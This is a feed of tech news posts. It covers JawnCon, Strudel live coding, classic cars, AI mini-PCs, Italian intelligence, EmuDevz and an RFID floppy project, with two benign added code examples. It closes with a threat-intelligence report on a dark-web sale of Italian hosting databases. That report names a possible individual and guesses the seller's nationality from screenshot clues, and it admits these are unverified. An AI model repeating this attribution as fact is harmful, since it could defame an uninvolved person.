Having a relatively active mesh added a new dynamic to the con. Occasionally, pieces of real-time information would make their way through the net, such as what time the nearby cafe was opening, or which talk was currently taking place. A few times it allowed for a quick response to semi-emergencies, such as when some hackers who shall remain nameless ended up causing a minor spill, and found themselves in need of cleaning supplies.

It also provided even more data to pore over — since the con wrapped, an SQLite database containing every packet that went through the mesh has been floating around for anyone who wants to analyze it. Hope nobody said anything they’ll regret…

Wardrive All the Things


This year, [BusySignal] returned with another big box of radio hardware. Unlike the impressive wardriving rig he showed off during the first JawnCon, this new build isn’t limited to just WiFi and Bluetooth. The concept has now evolved to include other wireless signals thanks to a bank of software-defined radios (SDRs), ranging from a handful of RTL-SDRs for the easy stuff like 433 MHz wireless sensors, and a HackRF for when things get a bit more serious.

The rig, enclosed in a rugged orange case and powered by batteries, exists at least in part so that [BusySignal] can show off the considerable capabilities of Kismet. He argues that the open source wireless sniffing suite is capable of much more than casual users may realize, and wants to inspire developers and hackers to add new protocols to the already impressive array of signals that it’s able to ingest and display.

This exploration of Kismet’s capabilities was the subject of his Saturday talk, Get More Radio Frequency Curious. Definitely one to keep an eye out for when the edited talks start hitting the JawnCon YouTube channel.

GameTank Comes Out to Play


Tucked away in one corner of the chill out area was an 8-bit game system that a passerby might have thought was a relic from the 1980s. But on closer inspection, its 3D printed shell quickly gives away the fact that it is no classic machine.

The GameTank is an open source hardware retroconsole designed around the 6502, more specifically, the modern W65C02S variant. Clyde Shaffer created the system in the spirit of other fantasy consoles like the Pico-8, with the key difference being that he started from the physical console and worked his way forward from there. It features a modernized development and debugging environment for both C and Rust, including an emulator that will run on Windows, Linux, and Mac OS. In fact, if you can take a hit to the performance, the emulator can even run right in the web browser — making it easy to check out the GameTank’s library of games.

We’ve actually covered the GameTank here on Hackaday in the past, but seeing it in person, you really appreciate all the little details. The cartridges specifically are a very nice touch. Of course, we know that a single modern SPI flash chip could allow the GameTank to hold hundreds (if not thousands) of games internally. Yet there’s just something so nostalgic about rummaging through a pile of cartridges, searching for a particular game, and then slamming it home into the console.

But is it any fun to play? To that end, I’m happy to say it passed the test with a few of the kids that ended up coming to JawnCon with their parents. I overheard someone at the lock picking table saying that their son had abandoned his expensive Nintendo Switch on the table in favor of pulling up a chair to the GameTank and basking in its CRT glory. Maybe the kids will be alright after all.

The Next Jawneration


It’s obviously very early to predict what the next JawnCon will look like. After all, a lot can happen in the next 359 days.

But having had the good fortune to attend all three of these events and seen its trajectory, I can say in my humble opinion that JawnCon is approaching an inflection point of sorts. While the area of Arcadia University that’s been made available for the con since its inception has never been particularly large, this was the first year it actually started to feel small. It’s no exaggeration to say that on several occasions, I struggled to find a surface flat enough to put my laptop down — whether it was lock picks, stickers, payphones, or even just cabling — literally every table in the room had something on it.

Of course, this isn’t necessarily a bad thing. If the worst that can be said about a hacker con was that it had a lot of people and so much interesting stuff on display that you couldn’t find a place to sit down, count me in. But in the same way keeping a plant in a pot that’s too small can stunt its growth, I think JawnCon will need to find a way to stretch its legs if it’s to remain healthy over the long term.

That being said, I plan on being there in 2026, and if you’re in the Philadelphia area, so should you. Even if it means we might have to take turns sitting in each other’s laps.


hackaday.com/2025/10/16/three-…


Live Coding Techno With Strudel


The super talented [Switch Angel] is an electronic music artist, with a few cool YouTube videos showing off just how thoroughly they have nailed live coding with Strudel. For us mere mortals, Strudel is a JavaScript port of TidalCycles, an algorithmic music generator which supports live coding, i.e. the music that is passed down to the synthesizer changes on-the-fly as you manipulate the code. It’s magical to watch (and listen to) how you can adapt and distort the music to your whims just by tweaking a few lines of code: no compilation steps, hardly any debugging and instant results.

The traditional view of music generators like this is to create lists of note/instrument pairs with appropriate modifiers. Each sound is specified in sequence — adding a sound extends the sequence a little. Strudel / Tidalcycles works a little differently and is based on the idea of repeating patterns over a fixed time. Adding an extra sound or breaking down one sound slot into multiple sounds squeezes all the remaining slots down, causing the whole pattern to repeat in the same period, with the sounds individually taking up less space. This simple change makes it really easy to add layer upon layer of interest within a sequence with a few extra characters, without recalculating everything else to fit. On top of this base, multiple effects can be layered—more than we can mention here—and all can be adjusted with pop-in sliders directly in the code.
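The fixed-cycle idea described above, as an added example that is not Strudel’s or TidalCycles’ own code: a toy JavaScript sequencer that parses a bracketed mini-notation pattern and lays it out over one cycle, so adding a step squeezes the others instead of lengthening the sequence. The helpers parseMini, layout, patternEvents and scheduleCycle are written for this example and are not Strudel API.

```javascript
// Added example, not Strudel's or TidalCycles' own code: a minimal sequencer in the
// spirit of their mini-notation. A pattern always fills exactly one cycle; adding a
// step (or nesting steps in [ ]) subdivides the available time instead of extending it.

// Parse "bd [sd hh] cp" into the nested array ["bd", ["sd", "hh"], "cp"].
// Only whitespace-separated words, nested [ ] groups and '~' rests are supported.
function parseMini(src) {
  let i = 0;
  function parseSeq(insideGroup) {
    const items = [];
    let tok = '';
    const flush = () => { if (tok) { items.push(tok); tok = ''; } };
    while (i < src.length) {
      const c = src[i++];
      if (c === '[') { flush(); items.push(parseSeq(true)); }
      else if (c === ']') {
        flush();
        if (!insideGroup) throw new Error('unexpected ] in pattern');
        if (items.length === 0) throw new Error('empty [] group');
        return items;
      }
      else if (/\s/.test(c)) flush();
      else tok += c;
    }
    flush();
    if (insideGroup) throw new Error('missing ] in pattern');
    return items;
  }
  return parseSeq(false);
}

// Lay a nested sequence out evenly over [begin, end); a nested group subdivides its own slot.
function layout(seq, begin, end, out) {
  const step = (end - begin) / seq.length;
  seq.forEach((item, k) => {
    const b = begin + k * step;
    const e = b + step;
    if (Array.isArray(item)) layout(item, b, e, out);
    else if (item !== '~') out.push({ sound: item, begin: b, end: e }); // '~' is silence
  });
  return out;
}

// Events of one pattern within a single cycle; begin/end are fractions of the cycle.
function patternEvents(src) {
  const seq = parseMini(src);
  return seq.length === 0 ? [] : layout(seq, 0, 1, []);
}

// Absolute timing for cycle number n at a given cycles-per-second rate (Tidal's cps):
// the cycle lasts 1/cps seconds, so every event is stretched by the same factor.
function scheduleCycle(src, n, cps) {
  return patternEvents(src).map(ev => ({
    sound: ev.sound,
    time: (n + ev.begin) / cps,
    dur: (ev.end - ev.begin) / cps,
  }));
}

// Demonstration of the squeeze: the cycle stays one unit long however many steps it holds.
for (const p of ['bd sd', 'bd sd hh', 'bd [sd hh] cp']) {
  console.log(p, '->', patternEvents(p).map(e => `${e.sound}@${e.begin.toFixed(3)}`).join(' '));
}
```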

You see, the code is also the visualizer. As the sequence runs, the notes and time periods are highlighted, with piano rolls and oscilloscope views adding to the visuals to help guide you. Tweaking the various components of the sound composition in real time with embedded sliders is a quick and easy way to smoothly hear the impact of settings. It just makes sense. Additionally, since Strudel is written in JavaScript, you can pull in external libraries of customized functions to make your code more straightforward to read, like this short library from [Switch Angel].

On the back end, the built-in web-based synthesizer is basic but functional for roughing out ideas. Still, for absolute control, you’re going to want to send the notes over to something like SuperCollider or Sonic Pi. This is easy because Strudel supports OSC, so it is a simple matter of configuration.

If you were thinking that you’ve seen a JavaScript-based generative music thing before, you’d be right. Whilst we’re thinking about generative music and generative art in general, what about having a look at this neat sound-and-light sculpture?

youtube.com/embed/GWXCCBsOMSg?…

youtube.com/embed/aPsq5nqvhxg?…

Thanks to [JohnU] for sending this in!


hackaday.com/2025/10/16/live-c…


A Tale of Two Car Design Philosophies


As a classic car enthusiast, my passion revolves around cars with a Made in West Germany stamp somewhere on them, partially because that phrase generally implied a reputation for mechanical honesty and engineering sanity. Air-cooled Volkswagens are my favorites, and in fact I wrote about these, and my own ’72 Super Beetle, almost a decade ago. The platform is incredibly versatile and hackable, not to mention inexpensive and repairable thanks to its design as a practical, affordable car originally meant for German families in the post-war era and which eventually spread worldwide. My other soft-spot is a car that might seem almost diametrically opposed to early VWs in its design philosophy: the Mercedes 300D. While it was a luxury vehicle, expensive and overbuilt in comparison to classic Volkswagens, the engineers’ design choices ultimately earned it a reputation as one of the most reliable cars ever made.

As much as I appreciate these classics, though, there’s almost nothing that could compel me to purchase a modern vehicle from either of these brands. The core reason is that both have essentially abandoned the design philosophies that made them famous in the first place. And while it’s no longer possible to buy anything stamped Made in West Germany for obvious reasons, even a modern car with a VIN starting with a W doesn’t carry that same weight anymore. It more likely marks a vehicle destined for a lease term rather than one meant to be repaired and driven for decades, like my Beetle or my 300D.

Punch Buggy Blue

Vintage Beetles also make excellent show cars and beach buggies. Photo courtesy of Bryan Cockfield
Starting with the downfall of Volkswagen, whose Beetle is perhaps the most iconic car ever made, their original stated design intent was to make something affordable and easily repairable with simple tools. The vehicles that came out of this era, including the Beetle, Bus, and Karmann Ghia, omitted many parts we’d think were absolutely essential on a modern car such as a radiator, air conditioner, ABS brakes, a computer, or safety features of any sort. But in exchange the vehicles are easily wrenched on for a very low cost.

For example, removing the valve covers only requires a flat screwdriver and takes about five seconds, and completing a valve adjustment from that point only requires a 13 mm wrench and maybe an additional half hour. The engines can famously be removed in a similar amount of time, and the entire bodies can be lifted off the chassis without much more effort. And some earlier models of Beetle will run just fine even without a battery, assuming you can get a push. As a result of cost and simplicity the Beetle and the other vehicles based on it were incredibly popular for almost an entire century and drove VW to worldwide fame.

This design philosophy didn’t survive the 80s and 90s, however, and this era saw VW abandon nearly everything that made it successful in the first place. Attempting any of the maintenance procedures listed above on a modern Jetta or Golf will have one scratching one’s head, wondering if there’s anything left of the soul of the Volkswagen from the 50s and 60s. Things like having to remove the bumper and grille to change a headlight assembly or removing the intake manifold to change a thermostat are commonplace now. They’ve also abandoned their low-cost roots, with their new retro-styled Bus costing many multiples of even the inflation-adjusted price of a Bus from the 1960s, well beyond what modern safety standards and technology alone would have added to the cost of the vehicle. Let’s also not forget that even when completely ignoring emissions standards, modern VWs have still remained overpriced and difficult to repair.
Besides design cues, there are virtually no similarities between these two cars. Photo courtesy of Bryan Cockfield

VW Is Not Alone


The story of Mercedes ends up in almost exactly the same place but from a completely opposite starting point. Mercedes of the 60s and 70s was known for building mostly indestructible tanks for those with means who wanted to feel like they were riding in the peak of luxury. And that’s what Mercedes mostly delivered: leather seats, power windows, climate control, a comfortable ride, and in a package that would easily go hundreds of thousands of miles with basic maintenance. In the case of the W123 platform, this number often extended to a million miles, a number absolutely unheard of for modern vehicles.

This is the platform my 1984 300D was based on, and mine was well over 300,000 miles before we eventually parted ways. Mercedes of this era also made some ultra-luxury vehicles that could be argued to be the ancestors of the modern Mercedes-Maybach, like the Mercedes 600, a car in which all of the power electronics were replaced with hydraulics, for the windows, the power reclining rear seat, and the automatic trunk alike.
Nothing lets you blend into the Palm Beach crowd as seamlessly as driving a Mercedes. Photo courtesy of Bryan Cockfield
While the Mercedes 600 isn’t exactly known for being a hobbyist car nowadays, the W123s certainly are. My 300D was simple by modern Mercedes standards with a mechanical fuel injected diesel engine that was excessively overbuilt. The mechanical climate control systems made out of springs, plastic, and hope might not be working anymore but I’d be truly surprised if the engine from this car isn’t still running today.

Even plenty of gas-powered Mercedes of that era are wrenchable (as long as you bought one from before Chrysler poisoned the company) and also deliver the luxury that Mercedes was known for and is still coasting on. And this ability to repair or work on a car at a minimum of cost didn’t mean Mercedes sacrificed luxury, either. These cars were known for comfort as well as reliability, something rarely combined in modern cars.

Indeed, like Volkswagen, it seems as though a modern Mercedes will make it just as far as the end of the first lease before it turns into an expensive maintenance nightmare. Mercedes at least has the excuse that it never recovered from infecting itself with Chrysler in the 90s, but Volkswagen has no corporate baggage as severe, instead making a conscious choice to regress towards the mean without the anchor of a lackluster American brand tied around its neck. But a few other less-obvious things have happened that have crushed the souls of my favorite vintage auto makers as well.

Toyota


Japanese automakers disrupted everything in the 70s and 80s with cars that had everything Volkswagen used to be: simple, inexpensive, repairable, and arguably even more reliable. And, with the advent of Lexus in the 80s and their first model, the LS400, they showed that they could master the Mercedes traits of bulletproof luxury as well. They didn’t need nostalgia or marketing mythology; they just quietly built what Volkswagen and Mercedes once promised, and Volkswagen, Mercedes, and almost every other legacy automaker at the time were simply unable to compete on any of these terms. Many people will blame increasing safety and emissions requirements on the changes seen in the last three decades, but fail to account for the fact that Japanese brands had these same requirements but were able to succeed despite them.

Marketing

Photo courtesy of Bryan Cockfield
Without being able to build reliable vehicles at a competitive price to Toyota, or Honda, or others, these companies turned to their marketing departments and away from their engineers. Many car makers, not just Mercedes and VW, chase gadgetry and features today rather than any underlying engineering principles. They also hope to sell buyers on a lifestyle rather than on the vehicle itself. With Mercedes it’s the image of luxury rather than luxury itself, and for Volkswagen especially it’s often nostalgia rather than repairability or reliability.

This isn’t limited to car companies, either. The 80s and 90s also ushered in a more general time of prioritizing stockholders and quarterly earnings rather than customers, long-term thinking, and quality. Companies like Boeing, GE, Craftsman, Sony, and Nokia have all fallen victim to the short-term trend at the expense of what once made them great.

Designing for Assembly Rather than Repair


And, if customers are only spending money on a lease term it doesn’t really matter if the cars last longer than that. So, it follows that the easiest way to trim costs when not designing for longevity is to design in ways that minimize assembly cost rather than costs of ownership. That’s partially how we get the classic “remove the bumper to replace the headlight” predicament of many modern vehicles: these cars are designed to please robots on the assembly line, not humans with wrenches.

Dealerships


The way that we’ve structured car buying as a society bears some of this burden as well. Dealerships, especially in North America, are protected by law and skew the car ownership experience significantly, generally to the detriment of car owners. Without these legal protections the dealership model would effectively disappear overnight, and their lobbying groups have fought tooth-and-nail to stop newer companies from shipping cars directly to owners. Not only do dealerships drive up the cost of purchasing a vehicle compared to if it were legally possible to buy direct from a manufacturer, they often make the bulk of their profits on service. That means their incentives are also aligned so that the more unreliable and complex vehicles become, the more the dealerships will benefit and entrench themselves further. This wasn’t as true when VW and Mercedes were making the vehicles that made them famous, but has slowly eroded what made these classics possible in the modern world.

Hope? Probably Not.


There’s no sign that any of these trends are slowing down, and to me it seems to be part of a broader trend that others like [Maya] have pointed out that goes beyond cars. And it’s a shame too as there’s a brand new frontier of electric vehicles that could (in theory) bring us back to a world where we could have reliable, repairable vehicles again. EVs are simpler machines at heart, and they could be the perfect platform for open-source software, accessible schematics, and owner repair. But manufacturers and dealers aren’t incentivized to build anything like the Volkswagens or Mercedes of old, electric or otherwise, even though they easily could. I also won’t hold my breath hoping for [Jeff Bezos] to save us, either, but I’d be happy to be proven wrong.
Buick Park Avenue: the last repairable luxury car? Photo courtesy of Bryan Cockfield
And I also don’t fault anyone for appreciating these legacy brands. I’ve picked on VW and Merc here because I’ve owned them and appreciate them too, or at least what they used to represent. The problem is that somewhere along the way, loyalty to engineering and design ideals got replaced by loyalty to the logo itself. If we really care about what made cars like the Beetle and 300D special in the first place, we should be demanding that the companies that built them live up to those values again, not making excuses when they don’t.

So for now, I’ll keep gravitating toward the vehicles that came closest to those ideals. Others at Hackaday have as well, notably [Lewin] and his Miata which certainly fits this bill. Although I don’t have my VW or Mercedes anymore, I currently have a ’19 Toyota pickup, largely designed in the early 2000s, which isn’t glamorous but it’s refreshingly honest by modern standards and is perhaps a last gasp from this company’s soul, as Toyota now risks following the same path that hollowed out Volkswagen and Mercedes: swapping durability and practicality for complexity, flashy features, and short-term profits. I was also gifted an old Buick with an engine I once heard described as “the time GM accidentally made a Toyota engine.” The rubber bits may be dry-rotting away, but it’s a perfect blend of my Beetle and my 300D because it’s cheap, comfortable, reliable, and fixable (and the climate control actually works). The only thing missing is that little stamp: Made in West Germany.


hackaday.com/2025/10/16/a-tale…


The era of supercomputers in one hand is coming! GIGABYTE ATOM: one petaflop and 128 GB, all for AI


On 15 October, alongside the much-touted NVIDIA DGX Spark, created in collaboration between NVIDIA and MediaTek, another mini AI accelerator made its debut: the GIGABYTE ATOM.

GIGABYTE Technology has announced the official launch of its AI TOP ATOM, a platform based on the NVIDIA Grace Blackwell GB10 superchip, the same one used in the DGX Spark.

This innovative solution features a lightweight design compatible with standard household power and ships with the NVIDIA AI software stack preinstalled, delivering powerful compute performance that makes it an ideal platform for AI prototyping, fine-tuning and inference.

The AI TOP ATOM comes with 128 GB of unified shared system memory, expandable to 4 TB of SSD storage, and delivers up to 1 petaFLOP of FP4 AI compute performance, supporting local processing of large language models with up to 200 billion parameters.

For advanced applications, users can link two AI TOP ATOM units via NVIDIA ConnectX-7, going beyond the limits of a single system and scaling to run AI models with up to 405 billion parameters through cluster computing to handle intensive AI workloads.

To provide a complete solution for generative AI development, the AI TOP ATOM integrates NVIDIA's AI software stack, offering a broad range of tools, development frameworks and libraries to accelerate AI projects.

The solution also incorporates GIGABYTE's exclusive AI TOP Utility software, which, through its intuitive interface, supports fine-tuning, inference, deployment and machine learning (ML) applications based on Large Language Models (LLM) and Large Multimodal Models (LMM), while safeguarding the privacy and security of local data.

Whether you are an AI developer, a researcher, a student or an educational institution, the GIGABYTE AI TOP ATOM offers a scalable and affordable solution to accelerate AI innovation. For more product information, visit GIGABYTE's official website and check availability with local distributors and resellers.

The article “The era of supercomputers in one hand is coming! GIGABYTE ATOM: one petaflop and 128 GB, all for AI” originally appeared on Red Hot Cyber.


100 years of Italian Intelligence! Mattarella celebrates the SIM centenary at the Quirinale


15 October 2025 marks an anniversary of exceptional significance in the history of Italian national security: one hundred years since the birth of the Servizio Informazioni Militare (SIM), the country's first intelligence service, established in 1925 by royal decree.

The SIM was created to unify the information structures of the Army, Navy and Air Force, laying the foundations for a coordinated system for protecting state security.

Since then, Italian intelligence has gone through a century of profound transformation, moving from its military origins in the years after the First World War to today's Sistema di informazione per la sicurezza della Repubblica, defined by Law no. 124 of 2007.

This evolution has accompanied the most significant moments in national history, from the birth of the Republic to today's major international challenges.

Over time, the intelligence community has consolidated a central role in guaranteeing the security of democratic institutions, the protection of citizens and international cooperation against global threats and emerging conflicts. Its activities, increasingly integrated with those of foreign partners, are today founded on the principles of legality, transparency and the defence of constitutional values.

The Centenary celebrations


To mark the Centenary, a programme of institutional initiatives has been prepared to highlight the contribution of the Intelligence community to the country and to raise public awareness of its strategic role.

Among the initiatives are the issue of a commemorative stamp within the series “Eccellenze del sistema produttivo e del Made in Italy” and the minting of a limited-edition commemorative coin.

The meeting at the Quirinale


On the occasion of this important anniversary, the President of the Republic, Sergio Mattarella, received a delegation of the Italian intelligence services at the Quirinale.

Taking part in the meeting were the Undersecretary of State to the Presidency of the Council of Ministers and Delegated Authority for the Security of the Republic, Alfredo Mantovano; the Director General of the Dipartimento delle Informazioni per la Sicurezza (DIS), Vittorio Rizzi; the Director of the Agenzia per le Informazioni e la Sicurezza Esterna (AISE), Giovanni Caravelli; and the Director of the Agenzia per le Informazioni e la Sicurezza Interna (AISI), Bruno Valensise.

The meeting was a moment of recognition for a century of constant commitment to protecting the Republic, in the spirit of an intelligence community that is increasingly modern, civilian and oriented towards serving citizens.

The article “100 years of Italian Intelligence! Mattarella celebrates the SIM centenary at the Quirinale” originally appeared on Red Hot Cyber.


EmuDevz is Literally a Software Game


The idea of gamifying all the things might have died down now that the current hype is shoving AI into all the things — but you’ve probably never seen it quite like EmuDevz, a game in which you develop an 8-bit emulator by [Rodrigo Alfonso].

There’s a lot of learning you’ll have to do along the way, about programming and how retro systems work, including diving into 6502 assembly code. Why 6502? Well, the emulator you’re working on (it’s partially written at the start of the game; you need only debug and finish the job) is for a fantasy system called the NEEES, “an antique game console released in 1983”. It’s the NEEES and not NES for two reasons. One, Nintendo has lawyers and they really, really know how to use them. Two, by creating a fantasy console that is not-quite-a-Famicom, the goalposts for EmuDevz can be moved a bit closer in.

The in-game emulator will handle most NES behavior, assuming you do your part correctly. A selection of homebrew NES games is included with EmuDevz, and they all run fine. A neat touch is giving you the ROMs for offline use as rewards when you get them running correctly. If some edge cases and exotic behaviours get left behind in the interests of simplicity, just remember: it’s not a NES, it’s a NEEES, and who can say? Perhaps this simplified system is exactly how it worked in the alternate universe where this game is set.

Aside from the invaluable assembly code, the work is done in JavaScript, which might not be everybody’s cup of tea. On the other hand, the whole thing is open-source (MIT license for the code, CC for the content) so if you really, really hate JS but love the idea of a learning game like this, you could fork to the language of your choice and learn even more.

Regardless of the language used, we like this model and think the “game where you learn to make games” is a great educational model for programming skills that ought to be used more often. For an idea of what it looks like, check out the trailer below.

Thanks to [Rodrigo Alfonso] for the tip. If you’ve got a great gamified learning tool — or any other cool hack, for that matter — the tips line is fun and rewarding, even if we haven’t tried to gamify it.

youtube.com/embed/sBhFulSp4KQ?…


hackaday.com/2025/10/16/emudev…


The DGX Spark is on sale. An AI supercomputer in the palm of your hand!


We wrote about the DGX Spark on 29 August, but now it appears that NVIDIA has released it and it has already sold out.

The artificial intelligence revolution has arrived, and now it fits in the palm of your hand. The NVIDIA DGX Spark is based on the NVIDIA GB10 Grace Blackwell superchip and went on sale on 15 October.

This revolutionary personal AI supercomputer lets developers prototype, fine-tune and run inference on large AI models from their desktop.

The GB10 draws on MediaTek's expertise in designing high-performance, low-power CPUs, memory subsystems and high-speed interfaces to power the 20-core Arm Grace CPU.
MediaTek Vice President and CEO Dr. Rick Tsai with his DGX Spark in hand. (Source: MediaTek)
The GB10 delivers up to 1 PFLOP of AI performance to accelerate model fine-tuning and real-time inference. Developers can work with large models of up to 200 billion parameters, or use the integrated ConnectX-7 networking technology to link two DGX Spark systems for inference tasks involving models of up to 405 billion parameters.

The design is ultra-compact, fits easily on a desktop and runs efficiently from a standard power outlet.

“DGX Spark will usher in the next era of AI prototyping and advance our mission of making quality technology more accessible from the edge to the cloud, while solving performance and power-consumption challenges,” said Vince Hu, Corporate Vice President of MediaTek's Data Center and Compute Business Group. “The GB10 Superchip leverages our expertise in high-performance computing for the data center, combined with our power-saving technologies for consumer devices, purpose-built to handle AI workloads.”

The GB10 collaboration builds on MediaTek's work with NVIDIA across several verticals, bringing advanced AI capabilities to hyperscale data centers, IoT applications and software-defined vehicles.

MediaTek works with leading brands to turn innovative ideas into scalable products, from everyday devices to enterprise and cloud systems. Our platforms unify compute, AI, connectivity and system software to deliver industry-leading performance per watt in innovative, reliable designs.

The article “The DGX Spark is on sale. An AI supercomputer in the palm of your hand!” originally appeared on Red Hot Cyber.


RFIDisk: When Floppy Drives Go Contactless


RFIDisk

Not too long ago, part of using a computer was often finding the correct disk for the application you wanted to run and inserting it into your machine before you could start. With modern storage, this is largely a thing of the past. However, longing for some of that nostalgia, [ItsDanik] has been developing the RFIDisk, a 3D printed floppy drive that can kick off applications when their disk is inserted.

The desktop enclosure is printed to look like a standalone floppy drive, allowing use with either desktops or laptops. There’s the familiar 3.5 inch slot ready for your floppy disk, and there’s also a 1.3 in. OLED display on the front giving you feedback on the status of the RFIDisk — including telling you what’s currently inserted. Inside the enclosure is an Arduino Uno and an MFRC522 RFID reader. As the name would suggest, the way the RFIDisk enclosure reads its media is via NFC, not the traditional magnetic reader. Due to being RFID-based, the disks printed for the RFIDisk are solid without moving parts, but enclose a 25 mm NTAG213 NFC tag.

On the software side, [ItsDanik] has developed the RFIDisk Manager Python application, which is used to tie specific NFC tag IDs to commands to run when that tag is read. The application includes some nice features, such as being able to adjust the commands for both when the disk is first read and when it’s removed from the RFIDisk. You can also change what shows up on the OLED screen when the cartridge is inserted.
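
As an added example (not [ItsDanik]'s RFIDisk Manager code), here is a tag-to-command dispatcher along the lines described above: a tag UID selects an OLED label plus fixed commands for insertion and removal, so nothing read from the serial line ever becomes part of a command. It assumes a hypothetical reader protocol in which the Arduino prints `TAG <hex uid>` on every poll while a tag is present and `NOTAG` otherwise.

```python
"""Tag-to-command dispatcher in the spirit of RFIDisk Manager (added example).
Assumed reader protocol (hypothetical): the Arduino prints "TAG <hex uid>"
on every poll while a tag sits in the slot and "NOTAG" when the slot is empty."""
import subprocess
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class DiskProfile:
    label: str                              # text for the OLED while inserted
    on_insert: List[str]                    # argv to run when the disk goes in
    on_remove: Optional[List[str]] = None   # argv to run when it comes out


@dataclass(frozen=True)
class Event:
    kind: str                   # "insert", "remove" or "unknown"
    uid: Optional[str]
    display: str                # what the OLED should show now
    argv: Optional[List[str]] = None


def normalize_uid(raw: str) -> Optional[str]:
    """Canonicalise "04:A1:..." or "04a1..." to upper-case hex; None unless it
    is 4, 7 or 10 bytes (ISO 14443-A sizes), so serial noise is never a key."""
    hexstr = raw.replace(":", "").replace(" ", "").strip().upper()
    if len(hexstr) not in (8, 14, 20):
        return None
    try:
        bytes.fromhex(hexstr)
    except ValueError:
        return None
    return hexstr


class DiskDispatcher:
    """Turns reader lines into insert/remove events, debouncing repeats."""

    def __init__(self, profiles: Dict[str, DiskProfile]):
        self.profiles = {}
        for uid, profile in profiles.items():
            key = normalize_uid(uid)
            if key is None:
                raise ValueError(f"bad UID in profile table: {uid!r}")
            self.profiles[key] = profile
        self.present: Optional[str] = None      # UID currently in the slot

    def handle_line(self, line: str) -> List[Event]:
        line = line.strip()
        if line == "NOTAG":
            return self._removed()
        if line.startswith("TAG "):
            uid = normalize_uid(line[4:])
            return self._seen(uid) if uid else []   # malformed UID: ignore
        return []                                   # anything else is noise

    def _seen(self, uid: str) -> List[Event]:
        if uid == self.present:
            return []                       # same disk still in the slot
        events = self._removed()            # swapped with no NOTAG in between
        self.present = uid
        profile = self.profiles.get(uid)
        if profile is None:
            events.append(Event("unknown", uid, "Unknown disk"))
        else:
            events.append(Event("insert", uid, profile.label, profile.on_insert))
        return events

    def _removed(self) -> List[Event]:
        if self.present is None:
            return []
        uid, self.present = self.present, None
        profile = self.profiles.get(uid)
        argv = profile.on_remove if profile else None
        return [Event("remove", uid, "No disk", argv)]


def execute(event: Event) -> Optional[int]:
    """Run the event's command, if any, with no shell; return its exit code.
    The UID only selected a fixed argv, it never reaches the command line."""
    if not event.argv:
        return None
    return subprocess.run(event.argv, check=False).returncode


if __name__ == "__main__":
    # Constructed profile table and serial trace; 'echo' stands in for the
    # launchers a real setup would configure.
    disks = {"04:A1:B2:C3:D4:E5:F6": DiskProfile("DOOM", ["echo", "run doom"],
                                                ["echo", "quit doom"]),
             "04112233445566": DiskProfile("Editor", ["echo", "run editor"])}
    dispatcher = DiskDispatcher(disks)
    for line in ["NOTAG", "TAG 04:A1:B2:C3:D4:E5:F6", "TAG 04a1b2c3d4e5f6",
                 "NOTAG", "TAG DEADBEEF", "TAG 04112233445566", "TAG zz", "NOTAG"]:
        for ev in dispatcher.handle_line(line):
            print(f"{ev.kind:8s} {ev.display!r:16s} exit={execute(ev)}")
```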

Using NFC to simulate physical media is a clever trick we’ve seen before, but if you’re looking for something with a bit more physical engagement, you could always put your USB devices into 3D printed cartridges.


hackaday.com/2025/10/16/rfidis…


Alert: thousands of Italian sites at risk! 526,000 sites and 6,500 DBs for sale on the dark web


A new post on the dark web offers full access to thousands of servers and MySQL databases belonging to Italian shared-hosting providers.

In the last few hours a new thread with an unequivocal title has appeared on an underground forum: “Italin hosting service sites – 9 more 40 servers – 526193 site’s backup – 4631 hosting customer – 6546 MySQL db’s”.

Disclaimer: This report includes screenshots and/or text taken from publicly accessible sources. The information provided is solely for threat-intelligence purposes and to raise awareness of cybersecurity risks. Red Hot Cyber condemns any unauthorised access, improper dissemination or unlawful use of such data. At present it is not possible to independently verify the authenticity of the information reported, since the organisation involved has not yet released an official statement on its website. Consequently, this article should be considered solely for informational and intelligence purposes.

The author of the post, who uses the nickname 010010, is a long-standing user of the platform (active since 2018) and is offering for sale, for $1,000 in TRC20, an entire data dump originating, by their own account, from Italian hosting infrastructures.

The screenshots published alongside the post clearly show:

  • A large SQL dump (1.33 GB) containing 16 files, named in a way that points to different environments or customers;
  • Full access to the MySQL databases, complete with a table t_payservice_mysql containing usernames and plaintext passwords for more than 6,500 instances;
  • Customer accounts and user codes, potentially belonging to resellers or end customers of Italian web-hosting companies.

A detail that should not be overlooked is the author's promise: “I will give the phpmyadmin mysql root password”, a sign that the access is not limited to the data but extends to the entire management system.

OSINT: who is the seller? Preliminary profile of “010010”


We carried out a preliminary OSINT analysis of the published evidence. The key points:

  • Actor's nick: 010010. A short binary nickname with a strong “technic/hacker” connotation, not a casual choice for a data seller. The forum account has been active since 2018, with reactions and credentials that indicate an established reputation (not a throwaway profile).
  • Contact and monetisation: the listing asks for $1,000 in USDT TRC20 and targets “technical” buyers (e.g. “people who know how to use the hosting panel”). The contact is an obfuscated Telegram handle, a typical pattern for evading moderation and dorks.
  • Screenshots: one of the screenshots shows an Explorer window in Turkish (labels such as Tür, Boyut, Tamam), and the bar displays the name stanislav karacetin with the profile path C:\Users\stani\Documents\hostingdatabase. This provides two concrete clues: the dump was aggregated and saved on a machine whose OS is set to Turkish, and the author of the screenshot (or the owner of the machine that generated the files) is identifiable as “stanislav / stani” at the local profile level.
  • Timing: the files carry timestamps of 14/10/2025 between 10:44 and 11:27, consistent with the time window of the publication.

Working hypothesis (high-level): the seller is most likely a technical operator, potentially active in the Turkish-speaking area or in possession of a machine configured in Turkish. The behaviour (binary nick, monetisation in TRC20, obfuscated Telegram contact) is consistent with vendors from the TR / Eastern Europe area active in the credential and database markets.

A case that highlights the fragility of shared hosting


Although the providers involved have not yet been identified, the technical evidence shows a pattern typical of Italian shared web-hosting infrastructures: databases named “clienti_nomeaziendaXX”, references to multiple domains and tables replicated for hundreds of users.

This type of compromise is often the result of:

  • exposed administration panels (cPanel, Plesk, DirectAdmin) with weak or reused credentials;
  • known vulnerabilities in hosted CMSs or web applications (WordPress, Joomla, PrestaShop);
  • poor segmentation between customers, which allows a single access to spread to the whole node.


A concrete risk for thousands of Italian sites and companies


If the data for sale turns out to be authentic, the impact would be significant: the databases shown contain customer accounts, passwords, domain codes and full site backups.
Information of this kind can be used for:

  • digital identity theft and cloning of legitimate websites;
  • unauthorised access to administration panels;
  • targeted supply-chain infections (injection of backdoors or malware into CMSs);
  • secondary attacks against the customers of the providers involved.

Once again, underground forums confirm their function as a parallel market for compromised infrastructure, where SQL dumps, RDP access and Plesk panels are sold at a premium.
In today's case, the Italian origin of the material is a further alarm bell for a sector, shared hosting, that continues to suffer from a chronic lack of segmentation and hardening.

